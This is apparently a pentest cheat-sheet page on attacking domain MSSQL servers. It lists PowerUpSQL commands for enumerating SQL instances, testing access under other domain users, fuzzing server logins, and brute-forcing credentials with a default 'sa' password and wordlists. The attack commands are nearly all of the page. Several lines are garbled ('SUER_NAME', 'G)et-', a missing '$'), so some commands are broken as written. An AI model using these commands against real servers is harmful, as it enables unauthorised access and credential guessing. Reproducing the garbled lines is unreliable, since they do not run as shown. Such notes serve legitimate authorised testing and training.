Skip to content

03. Exploitation

Brute-forcing

Check if current domain user has access to DB

Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose

Check if another domain user has access to DB

runas /noprofile /netonly /user:<domain\username>powershell.exe
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose

Fuzzing logins:

Get-SQLFuzzServerLogin -Instance ops-mssql –Verbose

This is equivalent to:

SELECT SUER_NAME(1)
SELECT SUER_NAME(2)
SELECT SUER_NAME(3)

BruteForce:

Get-SQLInstanceDomain | G)et-SQLConnectionTestThreaded -Username sa -Password Password -Verbose

$comps = $(Get-SQLInstanceDomain).ComputerName
comps | Invoke-BruteForce -UserList C:\dict\users.txt -PasswordList C:\dict\passwords.txt -Service SQL –Verbose